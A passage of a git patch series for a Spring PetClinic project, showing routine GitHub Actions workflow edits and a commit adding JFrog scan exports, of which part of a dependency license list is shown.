b/.github/workflows/ci-minimal.yml @@ -9,7 +9,6 @@ on: branches: [ main ] pull_request: branches: [ main ] - workflow_dispatch: # The actual workflow jobs. I've split some of these up to # allow more flexibility in future. From 7a30650cdb0d76922165f453fd43c6faacd8c782 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 14:35:49 +0100 Subject: [PATCH 21/35] added ignore branches --- .github/workflows/ci-minimal.yml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/.github/workflows/ci-minimal.yml b/.github/workflows/ci-minimal.yml index 1837e3f1d..3f3b675c1 100644 --- a/.github/workflows/ci-minimal.yml +++ b/.github/workflows/ci-minimal.yml @@ -6,9 +6,17 @@ name: Minimal build requirements for the petclinic application. # The workflow will execute on Push / PR as well as manually running. on: push: - branches: [ main ] + branches: + - main + branches-ignore: + - test + pull_request: - branches: [ main ] + branches: + - main + branches-ignore: + - test + # The actual workflow jobs. I've split some of these up to # allow more flexibility in future. From 1dd3d05391bb47b617f8ecc0b5f8fb87c5fbcd47 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 14:37:34 +0100 Subject: [PATCH 22/35] added ignore branches --- .github/workflows/ci-minimal.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/ci-minimal.yml b/.github/workflows/ci-minimal.yml index 3f3b675c1..f5f5c99cb 100644 --- a/.github/workflows/ci-minimal.yml +++ b/.github/workflows/ci-minimal.yml @@ -6,14 +6,14 @@ name: Minimal build requirements for the petclinic application. # The workflow will execute on Push / PR as well as manually running. on: push: - branches: - - main + # branches: + # - main branches-ignore: - test pull_request: - branches: - - main + # branches: + # - main branches-ignore: - test From cff61ad77535176f48b85f997ade4fb7f61eff13 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 14:39:35 +0100 Subject: [PATCH 23/35] fixed workflow runner event --- .github/workflows/ci-minimal.yml | 16 ++++++---------- 1 file changed, 6 insertions(+), 10 deletions(-) diff --git a/.github/workflows/ci-minimal.yml b/.github/workflows/ci-minimal.yml index f5f5c99cb..bbd942e2e 100644 --- a/.github/workflows/ci-minimal.yml +++ b/.github/workflows/ci-minimal.yml @@ -6,17 +6,13 @@ name: Minimal build requirements for the petclinic application. # The workflow will execute on Push / PR as well as manually running. on: push: - # branches: - # - main - branches-ignore: - - test - + branches: + - 'main' + pull_request: - # branches: - # - main - branches-ignore: - - test - + branches: + - 'main' + # The actual workflow jobs. I've split some of these up to # allow more flexibility in future. From 6368033cdfaa24be6500033db8ba74d08db82329 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 14:46:33 +0100 Subject: [PATCH 24/35] ci-minimal cleanup --- .github/workflows/ci-minimal.yml | 19 ------------------- 1 file changed, 19 deletions(-) diff --git a/.github/workflows/ci-minimal.yml b/.github/workflows/ci-minimal.yml index bbd942e2e..6226850fb 100644 --- a/.github/workflows/ci-minimal.yml +++ b/.github/workflows/ci-minimal.yml @@ -73,22 +73,3 @@ jobs: IMAGE_NAME: my0373.jfrog.io/my0373-docker/spring-petclinic:3.1.0-SNAPSHOT run: jf docker push $IMAGE_NAME - - # - name: Scan for vulnerabilities - # run: - # jf scan * - - # - name: Publish Build info With JFrog CLI - # env: - # # Generated and maintained by GitHub - # JFROG_CLI_BUILD_NAME: spring-petclinic - # # JFrog organization secret - # JFROG_CLI_BUILD_NUMBER : ${{ github.run_number }} - # run: | - # # Export the build name and build nuber - # # Collect environment variables for the build - # jf rt build-collect-env - # # Collect VCS details from git and add them to the build - # jf rt build-add-git - # # Publish build info - # jf rt build-publish \ No newline at end of file From e4eb3e568aa935b3f11308030d9b581eed9510f2 Mon Sep 17 00:00:00 2001 From: Matt York Date: Sun, 15 Oct 2023 14:53:41 +0100 Subject: [PATCH 25/35] Commiting scan data driectly to main --- Docker_07f669c_License_Export.json | 6065 +++++++++++++++++++ Docker_07f669c_Operational_risk_Export.json | 722 +++ Docker_07f669c_Security_Export.json | 840 +++ Docker_07f669c_Violations_Export.json | 215 + Docker_07f669c_applications.json | 1 + Docker_07f669c_secrets.json | 19 + Docker_07f669c_services.json | 1 + 7 files changed, 7863 insertions(+) create mode 100755 Docker_07f669c_License_Export.json create mode 100755 Docker_07f669c_Operational_risk_Export.json create mode 100755 Docker_07f669c_Security_Export.json create mode 100755 Docker_07f669c_Violations_Export.json create mode 100755 Docker_07f669c_applications.json create mode 100755 Docker_07f669c_secrets.json create mode 100755 Docker_07f669c_services.json diff --git a/Docker_07f669c_License_Export.json b/Docker_07f669c_License_Export.json new file mode 100755 index 000000000..fdf37f0eb --- /dev/null +++ b/Docker_07f669c_License_Export.json @@ -0,0 +1,6065 @@ +[ + { + "component_id": "bootstrap:5.2.3", + "component_name": "bootstrap", + "version": "5.2.3", + "pkg_type": "npm", + "package_id": "npm://bootstrap", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 2 + } + ] + } + ] + }, + { + "component_id": "caffeine-3.1.8.jar", + "component_name": "caffeine-3.1.8.jar", + "version": "", + "pkg_type": "generic", + "package_id": "generic://sha256:7dd15f9df1be238ffaa367ce6f556737a88031de4294dad18eef57c474ddf1d3/caffeine-3.1.8.jar", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ch.qos.logback:logback-classic:1.4.11", + "component_name": "ch.qos.logback:logback-classic", + "version": "1.4.11", + "pkg_type": "maven", + "package_id": "gav://ch.qos.logback:logback-classic", + "licenses": [ + { + "key": "EPL-1.0", + "link": "http://www.eclipse.org/legal/epl-v10.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "ch.qos.logback:logback-core:1.4.11", + "component_name": "ch.qos.logback:logback-core", + "version": "1.4.11", + "pkg_type": "maven", + "package_id": "gav://ch.qos.logback:logback-core", + "licenses": [ + { + "key": "EPL-1.0", + "link": "http://www.eclipse.org/legal/epl-v10.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.1", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "checker-qual-3.31.0.jar", + "component_name": "checker-qual-3.31.0.jar", + "version": "", + "pkg_type": "generic", + "package_id": "generic://sha256:1cef5f476d22c6fb45387ddd8404f5e821cbd66487be1bdf8ee64871e63451b9/checker-qual-3.31.0.jar", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.fasterxml.jackson.core:jackson-annotations:2.15.2", + "component_name": "com.fasterxml.jackson.core:jackson-annotations", + "version": "2.15.2", + "pkg_type": "maven", + "package_id": "gav://com.fasterxml.jackson.core:jackson-annotations", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.fasterxml.jackson.core:jackson-core:2.15.2", + "component_name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.15.2", + "pkg_type": "maven", + "package_id": "gav://com.fasterxml.jackson.core:jackson-core", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.fasterxml.jackson.core:jackson-databind:2.15.2", + "component_name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.15.2", + "pkg_type": "maven", + "package_id": "gav://com.fasterxml.jackson.core:jackson-databind", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.15.2", + "component_name": "com.fasterxml.jackson.datatype:jackson-datatype-jdk8", + "version": "2.15.2", + "pkg_type": "maven", + "package_id": "gav://com.fasterxml.jackson.datatype:jackson-datatype-jdk8", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.15.2", + "component_name": "com.fasterxml.jackson.datatype:jackson-datatype-jsr310", + "version": "2.15.2", + "pkg_type": "maven", + "package_id": "gav://com.fasterxml.jackson.datatype:jackson-datatype-jsr310", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.fasterxml.jackson.module:jackson-module-parameter-names:2.15.2", + "component_name": "com.fasterxml.jackson.module:jackson-module-parameter-names", + "version": "2.15.2", + "pkg_type": "maven", + "package_id": "gav://com.fasterxml.jackson.module:jackson-module-parameter-names", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.fasterxml:classmate:1.5.1", + "component_name": "com.fasterxml:classmate", + "version": "1.5.1", + "pkg_type": "maven", + "package_id": "gav://com.fasterxml:classmate", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.google.errorprone:error_prone_annotations:2.21.1", + "component_name": "com.google.errorprone:error_prone_annotations", + "version": "2.21.1", + "pkg_type": "maven", + "package_id": "gav://com.google.errorprone:error_prone_annotations", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.h2database:h2:2.1.214", + "component_name": "com.h2database:h2", + "version": "2.1.214", + "pkg_type": "maven", + "package_id": "gav://com.h2database:h2", + "licenses": [ + { + "key": "EPL-1.0", + "link": "http://www.eclipse.org/legal/epl-v10.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "MPL-2.0", + "link": "http://opensource.org/licenses/MPL-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.sun.istack:istack-commons-runtime:4.1.2", + "component_name": "com.sun.istack:istack-commons-runtime", + "version": "4.1.2", + "pkg_type": "maven", + "package_id": "gav://com.sun.istack:istack-commons-runtime", + "licenses": [ + { + "key": "EPL-1.0", + "link": "http://www.eclipse.org/legal/epl-v10.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "com.zaxxer:HikariCP:5.0.1", + "component_name": "com.zaxxer:HikariCP", + "version": "5.0.1", + "pkg_type": "maven", + "package_id": "gav://com.zaxxer:HikariCP", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "font-awesome:4.7.0", + "component_name": "font-awesome", + "version": "4.7.0", + "pkg_type": "npm", + "package_id": "npm://font-awesome", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "OFL-1.1", + "link": "http://scripts.sil.org/cms/scripts/page.php?item_id=OFL_web", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/BurntSushi/toml:1.3.2", + "component_name": "github.com/BurntSushi/toml", + "version": "1.3.2", + "pkg_type": "go", + "package_id": "go://github.com/BurntSushi/toml", + "licenses": [ + { + "key": "Unknown", + "link": "", + "sources": [] + } + ] + }, + { + "component_id": "github.com/BurntSushi/toml:1.1.0", + "component_name": "github.com/BurntSushi/toml", + "version": "1.1.0", + "pkg_type": "go", + "package_id": "go://github.com/BurntSushi/toml", + "licenses": [ + { + "key": "Unknown", + "link": "", + "sources": [] + } + ] + }, + { + "component_id": "github.com/Masterminds/semver/v3:3.2.1", + "component_name": "github.com/Masterminds/semver/v3", + "version": "3.2.1", + "pkg_type": "go", + "package_id": "go://github.com/Masterminds/semver/v3", + "licenses": [ + { + "key": "Unknown", + "link": "", + "sources": [] + } + ] + }, + { + "component_id": "github.com/apex/log:1.9.0", + "component_name": "github.com/apex/log", + "version": "1.9.0", + "pkg_type": "go", + "package_id": "go://github.com/apex/log", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/buildpacks/libcnb:1.28.0", + "component_name": "github.com/buildpacks/libcnb", + "version": "1.28.0", + "pkg_type": "go", + "package_id": "go://github.com/buildpacks/libcnb", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/creack/pty:1.1.18", + "component_name": "github.com/creack/pty", + "version": "1.1.18", + "pkg_type": "go", + "package_id": "go://github.com/creack/pty", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/golang/go:1.19.11", + "component_name": "github.com/golang/go", + "version": "1.19.11", + "pkg_type": "go", + "package_id": "go://github.com/golang/go", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/golang/go:1.20.5", + "component_name": "github.com/golang/go", + "version": "1.20.5", + "pkg_type": "go", + "package_id": "go://github.com/golang/go", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/google/go-cmp:0.5.9", + "component_name": "github.com/google/go-cmp", + "version": "0.5.9", + "pkg_type": "go", + "package_id": "go://github.com/google/go-cmp", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/h2non/filetype:1.1.3", + "component_name": "github.com/h2non/filetype", + "version": "1.1.3", + "pkg_type": "go", + "package_id": "go://github.com/h2non/filetype", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/heroku/color:0.0.6", + "component_name": "github.com/heroku/color", + "version": "0.0.6", + "pkg_type": "go", + "package_id": "go://github.com/heroku/color", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/imdario/mergo:0.3.16", + "component_name": "github.com/imdario/mergo", + "version": "0.3.16", + "pkg_type": "go", + "package_id": "go://github.com/imdario/mergo", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/magiconair/properties:1.8.7", + "component_name": "github.com/magiconair/properties", + "version": "1.8.7", + "pkg_type": "go", + "package_id": "go://github.com/magiconair/properties", + "licenses": [ + { + "key": "BSD-2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "Mup", + "link": "https://fedoraproject.org/wiki/Licensing/Mup", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/mattn/go-colorable:0.1.13", + "component_name": "github.com/mattn/go-colorable", + "version": "0.1.13", + "pkg_type": "go", + "package_id": "go://github.com/mattn/go-colorable", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/mattn/go-isatty:0.0.19", + "component_name": "github.com/mattn/go-isatty", + "version": "0.0.19", + "pkg_type": "go", + "package_id": "go://github.com/mattn/go-isatty", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/mattn/go-isatty:0.0.17", + "component_name": "github.com/mattn/go-isatty", + "version": "0.0.17", + "pkg_type": "go", + "package_id": "go://github.com/mattn/go-isatty", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/mattn/go-shellwords:1.0.12", + "component_name": "github.com/mattn/go-shellwords", + "version": "1.0.12", + "pkg_type": "go", + "package_id": "go://github.com/mattn/go-shellwords", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/miekg/dns:1.1.55", + "component_name": "github.com/miekg/dns", + "version": "1.1.55", + "pkg_type": "go", + "package_id": "go://github.com/miekg/dns", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/mitchellh/hashstructure/v2:2.0.2", + "component_name": "github.com/mitchellh/hashstructure/v2", + "version": "2.0.2", + "pkg_type": "go", + "package_id": "go://github.com/mitchellh/hashstructure/v2", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/onsi/gomega:1.27.8", + "component_name": "github.com/onsi/gomega", + "version": "1.27.8", + "pkg_type": "go", + "package_id": "go://github.com/onsi/gomega", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/paketo-buildpacks/libpak:1.66.1", + "component_name": "github.com/paketo-buildpacks/libpak", + "version": "1.66.1", + "pkg_type": "go", + "package_id": "go://github.com/paketo-buildpacks/libpak", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/pavlo-v-chernykh/keystore-go/v4:4.4.1", + "component_name": "github.com/pavlo-v-chernykh/keystore-go/v4", + "version": "4.4.1", + "pkg_type": "go", + "package_id": "go://github.com/pavlo-v-chernykh/keystore-go/v4", + "licenses": [ + { + "key": "MIT", + "link": "http://www.opensource.org/licenses/MIT", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/pkg/errors:0.9.1", + "component_name": "github.com/pkg/errors", + "version": "0.9.1", + "pkg_type": "go", + "package_id": "go://github.com/pkg/errors", + "licenses": [ + { + "key": "BSD-2-Clause", + "link": "http://opensource.org/licenses/BSD-2-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "github.com/xi2/xz:0.0.0-20171230120015-48954b6210f8", + "component_name": "github.com/xi2/xz", + "version": "0.0.0-20171230120015-48954b6210f8", + "pkg_type": "go", + "package_id": "go://github.com/xi2/xz", + "licenses": [ + { + "key": "Unknown", + "link": "", + "sources": [] + } + ] + }, + { + "component_id": "golang.org/x/net:0.11.0", + "component_name": "golang.org/x/net", + "version": "0.11.0", + "pkg_type": "go", + "package_id": "go://golang.org/x/net", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "golang.org/x/sys:0.9.0", + "component_name": "golang.org/x/sys", + "version": "0.9.0", + "pkg_type": "go", + "package_id": "go://golang.org/x/sys", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "golang.org/x/sys:0.7.0", + "component_name": "golang.org/x/sys", + "version": "0.7.0", + "pkg_type": "go", + "package_id": "go://golang.org/x/sys", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "io.micrometer:micrometer-commons:1.11.3", + "component_name": "io.micrometer:micrometer-commons", + "version": "1.11.3", + "pkg_type": "maven", + "package_id": "gav://io.micrometer:micrometer-commons", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "io.micrometer:micrometer-core:1.11.3", + "component_name": "io.micrometer:micrometer-core", + "version": "1.11.3", + "pkg_type": "maven", + "package_id": "gav://io.micrometer:micrometer-core", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "io.micrometer:micrometer-observation:1.11.3", + "component_name": "io.micrometer:micrometer-observation", + "version": "1.11.3", + "pkg_type": "maven", + "package_id": "gav://io.micrometer:micrometer-observation", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "io.smallrye:jandex:3.0.5", + "component_name": "io.smallrye:jandex", + "version": "3.0.5", + "pkg_type": "maven", + "package_id": "gav://io.smallrye:jandex", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "jakarta.activation:jakarta.activation-api:2.1.2", + "component_name": "jakarta.activation:jakarta.activation-api", + "version": "2.1.2", + "pkg_type": "maven", + "package_id": "gav://jakarta.activation:jakarta.activation-api", + "licenses": [ + { + "key": "BSD", + "link": "http://directory.fsf.org/wiki/License:BSD_4Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + } + ] + }, + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "EDL 1.0", + "link": "", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "jakarta.annotation:jakarta.annotation-api:2.1.1", + "component_name": "jakarta.annotation:jakarta.annotation-api", + "version": "2.1.1", + "pkg_type": "maven", + "package_id": "gav://jakarta.annotation:jakarta.annotation-api", + "licenses": [ + { + "key": "EPL-2.0", + "link": "https://spdx.org/licenses/EPL-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0+CE", + "link": "http://www.gnu.org/software/classpath/license.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "jakarta.inject:jakarta.inject-api:2.0.1", + "component_name": "jakarta.inject:jakarta.inject-api", + "version": "2.0.1", + "pkg_type": "maven", + "package_id": "gav://jakarta.inject:jakarta.inject-api", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "jakarta.persistence:jakarta.persistence-api:3.1.0", + "component_name": "jakarta.persistence:jakarta.persistence-api", + "version": "3.1.0", + "pkg_type": "maven", + "package_id": "gav://jakarta.persistence:jakarta.persistence-api", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "EPL-1.0", + "link": "http://www.eclipse.org/legal/epl-v10.html", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "EPL-2.0", + "link": "https://spdx.org/licenses/EPL-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "jakarta.transaction:jakarta.transaction-api:2.0.1", + "component_name": "jakarta.transaction:jakarta.transaction-api", + "version": "2.0.1", + "pkg_type": "maven", + "package_id": "gav://jakarta.transaction:jakarta.transaction-api", + "licenses": [ + { + "key": "EPL-2.0", + "link": "https://spdx.org/licenses/EPL-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "GPL-2.0+CE", + "link": "http://www.gnu.org/software/classpath/license.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + }, + { + "key": "LGPL-2.0", + "link": "http://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html", + "sources": [ + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "jakarta.validation:jakarta.validation-api:3.0.2", + "component_name": "jakarta.validation:jakarta.validation-api", + "version": "3.0.2", + "pkg_type": "maven", + "package_id": "gav://jakarta.validation:jakarta.validation-api", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "jakarta.xml.bind:jakarta.xml.bind-api:4.0.0", + "component_name": "jakarta.xml.bind:jakarta.xml.bind-api", + "version": "4.0.0", + "pkg_type": "maven", + "package_id": "gav://jakarta.xml.bind:jakarta.xml.bind-api", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "javax.cache:cache-api:1.1.1", + "component_name": "javax.cache:cache-api", + "version": "1.1.1", + "pkg_type": "maven", + "package_id": "gav://javax.cache:cache-api", + "licenses": [ + { + "key": "Apache-2.0", + "link": "http://licenses.nuget.org/Apache-2.0", + "sources": [ + { + "source": "JFrog", + "occurrences": 1 + }, + { + "source": "Local File", + "occurrences": 1 + } + ] + } + ] + }, + { + "component_id": "jrt-fs.jar", + "component_name": "jrt-fs.jar", + "version": "", + "pkg_type": "generic", + "package_id": "generic://sha256:6e7dcc31554bd67f457cbab59f6cac9f6daa8cb45a741a63699396c03a2a7dab/jrt-fs.jar", + "licenses": [ + { + "key": "Unknown", + "link": "", + "sources": [] + } + ] + }, + { + "component_id": "mysql-connector-j-8.0.33.jar", + "component_name": "mysql-connector-j-8.0.33.jar", + "version": "", + "pkg_type": "generic", + "package_id": "generic://sha256:e2a3b2fc726a1ac64e998585db86b30fa8bf3f706195b78bb77c5f99bf877bd9/mysql-connector-j-8.0.33.jar", + "licenses": [ + { + "key": "BSD-3-Clause", + "link": "http://opensource.org/licenses/BSD-3-Clause", + 